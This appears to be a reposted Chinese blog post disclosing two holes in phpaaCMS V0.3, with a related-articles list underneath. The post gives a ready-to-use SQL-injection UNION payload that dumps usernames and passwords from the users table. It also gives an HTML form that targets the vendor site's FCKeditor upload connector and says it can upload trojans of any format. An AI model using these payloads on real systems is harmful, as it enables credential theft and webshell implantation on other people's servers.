phpaaCMS V0.3 存在注射oday漏洞

简介:
偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
//您已经在您的SQL语法错误,检查手册,对应于你的MySQL语法的正确使用服务器版本附近'\ ''行1
哈哈既然爆错了,应该就戏了,继续猜字段 order by ,结果字段是15,但是又不知道数据库,马虎的去看了下官方的发现数据库是 cms_cms_users 在字段3和11分别是username 和 password
得出语句为:and%201=2%20union%20select%201,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users
看了看官方也存在这个:
EXP:
漏洞2:
进去后台后 有个php的 Fckeditor编辑器 版本是2.4.2以下的吧。
EXP
<form id="frmUpload" enctype="multipart/form-data"
action=" http://www.phpaa.cn/include/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
可以上传任何格式的木马进去, 悲剧! 


本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/301004,如需转载请自行联系原作者
目录
打赏
0
0
0
0
265
分享
相关文章
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
威胁快报|CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警(CNVD-C-2018-127157/CVE-2018-19127)
11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快升级到最新版本修复。
2191 0
Tor也加入了漏洞奖励计划,悬赏4000美元挖漏洞
本文讲的是Tor也加入了漏洞奖励计划,悬赏4000美元挖漏洞,网络黑客猖狂的时代,很多组织除了利用自己的内部资源来完善产品外,还会发动群众(比如白帽子和技术达人)来从外部监控替自己解决问题(比如及时发现和处理潜在安全漏洞)。
1225 0